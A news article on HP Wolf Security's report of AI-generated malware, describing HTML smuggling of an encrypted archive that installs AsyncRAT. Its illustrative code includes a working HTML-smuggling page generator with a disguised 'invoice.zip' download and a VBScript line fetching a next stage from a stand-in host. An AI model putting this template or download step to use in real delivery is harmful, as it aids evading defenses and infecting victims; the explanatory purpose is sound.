Cybercrime: AI-generated malware spotted in the wild
Security experts from HP point to a worrying trend: criminals are increasingly using generative AI to develop malware.
(Image: Balefire / Shutterstock.com)
The September issue of HP Wolf Security's Threat Insights Report shows that cybercriminals are increasingly using generative AI to develop malware. Until now, the possibility of developing malware with generative AI had mainly been demonstrated in research projects. Criminals had previously used ChatGPT and similar tools primarily to create phishing campaigns.
In the report, the authors describe an email attachment that had been isolated by the HP Sure Click security solution. The attachment, disguised as an invoice, turned out to be an HTML file that requested a password when opened in the browser. The body of the email was not available to the report's authors, but presumably contained the requested password.
Initial analysis of the code pointed to HTML smuggling, i.e. an attempt to sneak malicious code past defenses inside the HTML attachment itself. In contrast to most other attacks of this kind, however, the malicious payload was not simply stored inside an archive: it was AES-encrypted, and the decryption routine had been implemented, error-free, in the code of the HTML file itself.
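To make the technique concrete, here is a minimal, harmless Python sketch of the general HTML-smuggling pattern: a payload is embedded in the HTML file and only reassembled by JavaScript in the victim's browser, so no recognizable file download crosses the network perimeter. The payload, filenames, and page structure below are illustrative assumptions, not taken from the sample HP analyzed (which additionally AES-encrypted its payload).

```python
import base64

# Harmless stand-in for a malicious payload; real attacks embed an
# (often encrypted) archive here instead.
payload = b"example-payload-bytes"
encoded = base64.b64encode(payload).decode("ascii")

# Minimal HTML smuggling page: the payload travels inside the HTML file
# itself and is decoded client-side, then offered as a file download.
html_page = f"""<!DOCTYPE html>
<html><body><script>
  const bytes = Uint8Array.from(atob("{encoded}"), c => c.charCodeAt(0));
  const blob = new Blob([bytes], {{ type: "application/octet-stream" }});
  const link = document.createElement("a");
  link.href = URL.createObjectURL(blob);
  link.download = "invoice.zip";  // disguised as an invoice
  link.click();
</script></body></html>"""

# The payload is embedded in the page rather than fetched from a server,
# which is what makes this pattern hard for perimeter scanners to spot.
print(encoded in html_page)
```

Because the file arriving at the gateway is "just" HTML and the payload only materializes in the browser, scanners that inspect network downloads see nothing executable.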
In order to decrypt the archive, the security experts first had to crack the password. The decrypted .zip archive contained a Visual Basic script file that starts various processes on the computer and installs the remote access Trojan AsyncRAT on the system. AsyncRAT is open-source malware that allows an attacker to take over a computer remotely once it has been installed on the system.
AI lowers entry barriers for cybercrime novices
The criminals apparently used generative AI to develop the infection chain that could have led to the installation of the Trojan. When analyzing the code, the HP security researchers found very clear indications of this: every single function carried a comment, and the variable names likewise suggested that the programs had been written by an AI.
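The researchers' observation, a comment on every function plus telltale variable names, can be turned into a crude signal. The sketch below is purely illustrative and not HP's actual method: it measures the comment density of a VBScript snippet (the sample script and any threshold one might apply are assumptions).

```python
def comment_density(vbscript: str) -> float:
    """Fraction of non-empty lines that are VBScript comments (start with ')."""
    lines = [line.strip() for line in vbscript.splitlines() if line.strip()]
    comments = [line for line in lines if line.startswith("'")]
    return len(comments) / len(lines) if lines else 0.0

# Hypothetical snippet in the style described in the report: every
# step annotated with a comment, as AI code generators tend to do.
sample = """\
' Build the download URL for the next stage
url = "http://example.invalid/stage2"
' Create the HTTP request object
Set http = CreateObject("MSXML2.XMLHTTP")
' Fetch the payload synchronously
http.Open "GET", url, False
"""

print(comment_density(sample))  # 0.5 -> every other line is a comment
```

Hand-written malware is typically stripped of comments to hinder analysis, so an unusually high density like this is one of several hints, alongside descriptive variable names, that the researchers pointed to.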
Patrick Schläpfer, a security researcher at the HP Security Lab, commented according to CNBC that such uses of generative AI lower the barriers to entry into cybercrime and allow newcomers without programming skills to carry out more dangerous attacks.
However, AI-generated malware is not the only point worth highlighting in the report. So-called ChromeLoader campaigns are also becoming increasingly sophisticated: malvertising lures Internet users to well-crafted websites where supposed PDF tools containing well-disguised malware are offered for download.
(kst)